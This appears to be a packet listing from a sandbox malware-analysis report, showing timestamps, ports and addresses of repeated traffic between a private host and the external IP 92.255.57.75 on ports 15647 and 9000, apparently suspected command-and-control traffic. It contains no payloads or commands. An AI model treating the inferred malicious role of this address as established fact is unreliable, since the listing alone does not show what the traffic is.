Dec 17, 2024 08:39:41.650597095 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.681700945 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.681788921 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.801469088 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.801635027 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.865487099 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.865639925 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.921459913 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.921545029 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:41.962904930 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.989414930 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:41.989552021 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.041316032 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.041443110 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.109739065 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.109889030 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.113779068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.115853071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.201406956 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.201590061 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.229779959 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.231795073 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.233598948 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.282548904 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.351531029 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.351763964 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.353496075 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.407577038 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.477617025 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.477829933 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.653467894 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.655823946 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.664130926 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.667830944 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.700011969 CET	9000	49949	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.700054884 CET	9000	49949	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.702171087 CET	49949	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.702343941 CET	49949	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.775547981 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.777882099 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.787544012 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.787750959 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.789844036 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.814764023 CET	49950	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.821993113 CET	9000	49949	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.845061064 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.856226921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.857274055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.907521963 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.934669971 CET	9000	49950	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.934761047 CET	49950	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.935051918 CET	49950	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:42.967771053 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:42.967845917 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.017467022 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.017517090 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.056647062 CET	9000	49950	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.087745905 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.087873936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.090250015 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.141937017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.181430101 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.181552887 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.207709074 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.207794905 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.280397892 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.280584097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.301383018 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.327617884 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.400366068 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.400407076 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.400572062 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.472136974 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.472342014 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.521650076 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.521733999 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.592067003 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.592206001 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.592545033 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.641889095 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.693506002 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.693555117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.708385944 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.712763071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.751332045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.814433098 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.814519882 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.834691048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.834798098 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:43.955460072 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:43.955553055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.006220102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.006310940 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.074062109 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.074207067 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.117794037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.117907047 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.128079891 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.128176928 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.196619034 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.196672916 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.198203087 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.249272108 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.249334097 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.262701035 CET	9000	49950	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.262717962 CET	9000	49950	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.262768030 CET	49950	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.262974024 CET	49950	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.320492983 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.322640896 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.376909971 CET	49956	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.382613897 CET	9000	49950	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.413506031 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.413629055 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.431672096 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.442388058 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.485702991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.496710062 CET	9000	49956	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.496788025 CET	49956	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.496937037 CET	49956	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.533375025 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.533443928 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.553556919 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.553642035 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.616719961 CET	9000	49956	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.673583031 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.675818920 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.726000071 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.726151943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.841439009 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.843844891 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.845597982 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.845890999 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.891927004 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.918256998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.918360949 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:44.963675022 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:44.963736057 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.037575006 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.037647009 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.038125992 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.083714008 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.083772898 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.157371044 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.157548904 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.203584909 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.203715086 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.230500937 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.230657101 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.321425915 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.321500063 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.323483944 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.349783897 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.391944885 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.465764046 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.465919018 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.542810917 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.542980909 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.634587049 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.634646893 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.658133984 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.663733006 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.704397917 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.755573988 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.755677938 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.778951883 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.779181004 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.820590973 CET	9000	49956	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.820686102 CET	9000	49956	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.820750952 CET	49956	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.820869923 CET	49956	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.899849892 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.899964094 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.923892021 CET	49962	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:45.940587997 CET	9000	49956	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.946892023 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:45.947817087 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.044061899 CET	9000	49962	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.044154882 CET	49962	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.044333935 CET	49962	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.077975035 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.077992916 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.078052998 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.078078985 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.164216995 CET	9000	49962	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.198016882 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.198081017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.212172985 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.266932011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.269685030 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.269808054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.362610102 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.362684965 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.389507055 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.389554024 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.390161037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.438817978 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.511524916 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.511534929 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.511697054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.674907923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.675013065 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.824268103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.825006008 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:46.991137028 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:46.991836071 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.016638994 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.017688036 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.137962103 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.138051987 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.198941946 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.199044943 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.257718086 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.257766962 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.305166006 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.305254936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.319066048 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.372617960 CET	9000	49962	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.372780085 CET	9000	49962	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.372942924 CET	49962	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.372977972 CET	49962	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.378078938 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.378153086 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.425148964 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.425586939 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.450150013 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.486373901 CET	49964	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.492681980 CET	9000	49962	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.501346111 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.541522980 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.543853998 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.545516968 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.569988966 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.571820021 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.606178999 CET	9000	49964	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.606300116 CET	49964	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.608690023 CET	49964	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.690198898 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.691844940 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.729401112 CET	9000	49964	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.745520115 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.748155117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.811784983 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.813401937 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.817805052 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.860837936 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.910013914 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:47.910125017 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:47.934297085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.004081011 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.004384041 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.029963970 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.057924986 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.057995081 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.169565916 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.169636011 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.177860022 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.177907944 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.196158886 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.251332045 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.294050932 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.294193983 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.345545053 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.345596075 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.414282084 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.414349079 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.465436935 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.465490103 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.481796980 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.532577991 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.577502012 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.577620029 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.585316896 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.606463909 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.606686115 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.658008099 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.658176899 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.726435900 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.726560116 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.777782917 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.777925014 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.833451033 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.833517075 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.846501112 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.889625072 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.889734983 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.897675037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.933342934 CET	9000	49964	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.933505058 CET	9000	49964	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.933542013 CET	49964	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.933573008 CET	49964	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:48.954251051 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:48.954967022 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.009473085 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.009530067 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.038625956 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.039787054 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.048867941 CET	49969	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.053277969 CET	9000	49964	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.118880987 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.119775057 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.130208969 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.147635937 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.147914886 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.169594049 CET	9000	49969	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.171814919 CET	49969	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.171967030 CET	49969	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.218487024 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.218698978 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.240828037 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.268201113 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.268347025 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.292845964 CET	9000	49969	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.385404110 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.385620117 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.388201952 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.432342052 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.435873985 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.501600027 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.501746893 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.505454063 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.555794001 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.555875063 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.621536016 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.621617079 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.624028921 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.673152924 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.717428923 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.717725039 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.743362904 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.743522882 CET	49796	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:39:49.749893904 CET	15647	49796	92.255.57.75	192.168.2.11
Dec 17, 2024 08:39:49.798295975 CET	49796	15647	192.168.2.11	92.255.57.75
